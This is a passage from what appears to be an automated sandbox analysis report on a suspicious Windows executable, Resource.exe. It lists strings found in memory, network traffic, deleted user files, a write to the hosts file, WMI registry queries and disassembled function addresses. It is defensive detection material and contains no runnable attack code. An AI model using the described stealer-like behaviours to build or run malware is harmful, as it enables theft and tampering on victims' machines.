              Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182066365.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2470045759.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263382066.0000020AB3D05000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473942737.0000020AB3D08000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263201578.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2469860904.0000020AB3CE1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2245183110.0000020AB3CDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
              Source: Resource.exe, 00000001.00000002.2472335398.0000020AB36AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2472335398.0000020AB3636000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: Resource.exe, 00000001.00000002.2475852502.0000020AB40C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: Resource.exe, 00000001.00000003.2197829260.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190023337.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2196747987.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190835333.0000020AB3E39000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2263418579.0000020AB4691000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: Resource.exe, 00000001.00000003.2263418579.0000020AB4691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contF
              Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: Resource.exe, 00000001.00000003.2194450879.0000020AB3E55000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2183140611.0000020AB3E55000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Resource.exe, 00000001.00000003.2156478415.0000020AB46A7000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2161281040.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2163975768.0000020AB46D2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Resource.exe, 00000001.00000002.2472629307.0000020AB3932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: Resource.exe, 00000001.00000003.2161807649.0000020AB3E3F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2164773862.0000020AB3E3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: Resource.exe, 00000001.00000003.2190168428.0000020AB3BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: Resource.exe, 00000001.00000002.2477629542.0000020AB4FAC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmp, Resource.exe, 00000001.00000002.2482832538.00007FF8A8799000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: Resource.exe, 00000001.00000002.2472003336.0000020AB30E0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: Resource.exe, Resource.exe, 00000001.00000002.2483357030.00007FF8A8D68000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: Resource.exe, 00000001.00000002.2475663980.0000020AB4088000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: Resource.exe, 00000001.00000002.2476060853.0000020AB4270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: Resource.exe, 00000001.00000003.2469239519.0000020AB3D2F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473117545.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2363232730.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2162875077.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2208655261.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2143553843.0000020AB3CE2000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182427502.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2176084487.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473991715.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3D31000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2262114078.0000020AB3D2A000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2153816176.0000020AB3CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\Resource.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BJZFPPWAPT.xlsxJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\TQDFJHPUIU.pngJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\TQDFJHPUIU.pngJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\JDDHMPCDUJ.jpgJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\EFOYFBOLXA.jpgJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 74

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF6185E3A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61860B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,103_2_00007FF61860B57C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C0F380_2_00007FF6E60C0F38
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7E4C0_2_00007FF6E60B7E4C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C63700_2_00007FF6E60C6370
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A79500_2_00007FF6E60A7950
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C72BC0_2_00007FF6E60C72BC
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A1F500_2_00007FF6E60A1F50
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7E4C0_2_00007FF6E60B7E4C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A8FD00_2_00007FF6E60A8FD0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C9FF80_2_00007FF6E60C9FF8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60BE01C0_2_00007FF6E60BE01C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B18800_2_00007FF6E60B1880
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B20A00_2_00007FF6E60B20A0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B2D500_2_00007FF6E60B2D50
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C6D700_2_00007FF6E60C6D70
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C65EC0_2_00007FF6E60C65EC
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B1E940_2_00007FF6E60B1E94
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B86D00_2_00007FF6E60B86D0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B36E00_2_00007FF6E60B36E0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C1EE40_2_00007FF6E60C1EE4
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B5F300_2_00007FF6E60B5F30
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C471C0_2_00007FF6E60C471C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60BA4300_2_00007FF6E60BA430
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B1C900_2_00007FF6E60B1C90
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60BE4B00_2_00007FF6E60BE4B0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B7C980_2_00007FF6E60B7C98
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C0F380_2_00007FF6E60C0F38
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C42800_2_00007FF6E60C4280
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B1A840_2_00007FF6E60B1A84
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B22A40_2_00007FF6E60B22A4
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60B3AE40_2_00007FF6E60B3AE4
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60BEB300_2_00007FF6E60BEB30
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A81818A01_2_00007FF8A81818A0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8797B301_2_00007FF8A8797B30
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87F0A501_2_00007FF8A87F0A50
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8849A701_2_00007FF8A8849A70
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E8CF01_2_00007FF8A87E8CF0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88340D01_2_00007FF8A88340D0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E82901_2_00007FF8A87E8290
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A882F8901_2_00007FF8A882F890
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88518501_2_00007FF8A8851850
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87DE9801_2_00007FF8A87DE980
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88159301_2_00007FF8A8815930
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D69481_2_00007FF8A87D6948
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8831A801_2_00007FF8A8831A80
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8864AB01_2_00007FF8A8864AB0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87DAAB01_2_00007FF8A87DAAB0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8856BE01_2_00007FF8A8856BE0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A881CB501_2_00007FF8A881CB50
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87EBB701_2_00007FF8A87EBB70
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87F7C901_2_00007FF8A87F7C90
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D3CA01_2_00007FF8A87D3CA0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8829CD01_2_00007FF8A8829CD0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8828DF01_2_00007FF8A8828DF0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87F2D201_2_00007FF8A87F2D20
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D6D421_2_00007FF8A87D6D42
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87DFD601_2_00007FF8A87DFD60
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8817E101_2_00007FF8A8817E10
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A883DE701_2_00007FF8A883DE70
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8840FC01_2_00007FF8A8840FC0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D8F101_2_00007FF8A87D8F10
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87FBF401_2_00007FF8A87FBF40
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E70C01_2_00007FF8A87E70C0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D40F01_2_00007FF8A87D40F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87EC1C01_2_00007FF8A87EC1C0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E11201_2_00007FF8A87E1120
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87F62C01_2_00007FF8A87F62C0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87F52D01_2_00007FF8A87F52D0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88712501_2_00007FF8A8871250
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D43901_2_00007FF8A87D4390
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88573F01_2_00007FF8A88573F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87FD3F01_2_00007FF8A87FD3F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88443101_2_00007FF8A8844310
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87EB3101_2_00007FF8A87EB310
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88133701_2_00007FF8A8813370
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A883F3601_2_00007FF8A883F360
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D94801_2_00007FF8A87D9480
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87FB4901_2_00007FF8A87FB490
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A881E4F01_2_00007FF8A881E4F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88394F01_2_00007FF8A88394F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D64001_2_00007FF8A87D6400
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88584301_2_00007FF8A8858430
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A887E4301_2_00007FF8A887E430
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E25F01_2_00007FF8A87E25F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87FF5701_2_00007FF8A87FF570
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A880A6B51_2_00007FF8A880A6B5
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A882D6A01_2_00007FF8A882D6A0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88646C01_2_00007FF8A88646C0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88046101_2_00007FF8A8804610
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88287A01_2_00007FF8A88287A0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A881D7001_2_00007FF8A881D700
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87FC7201_2_00007FF8A87FC720
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88387701_2_00007FF8A8838770
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A88808A01_2_00007FF8A88808A0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A888F8401_2_00007FF8A888F840
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87D28501_2_00007FF8A87D2850
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A87E58501_2_00007FF8A87E5850
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8F29F901_2_00007FF8A8F29F90
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A9315DC01_2_00007FF8A9315DC0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A9308AA01_2_00007FF8A9308AA0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1A0F1_2_00007FF8A92D1A0F
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1CC11_2_00007FF8A92D1CC1
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D16FE1_2_00007FF8A92D16FE
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D8BE01_2_00007FF8A92D8BE0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D143D1_2_00007FF8A92D143D
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A933CDA01_2_00007FF8A933CDA0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D27161_2_00007FF8A92D2716
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D11811_2_00007FF8A92D1181
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D16131_2_00007FF8A92D1613
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D262B1_2_00007FF8A92D262B
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D17F81_2_00007FF8A92D17F8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A9310F901_2_00007FF8A9310F90
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92F62901_2_00007FF8A92F6290
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1AD71_2_00007FF8A92D1AD7
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1EE71_2_00007FF8A92D1EE7
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1D981_2_00007FF8A92D1D98
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1B541_2_00007FF8A92D1B54
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A934A7401_2_00007FF8A934A740
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D11721_2_00007FF8A92D1172
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1FE61_2_00007FF8A92D1FE6
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A931D9601_2_00007FF8A931D960
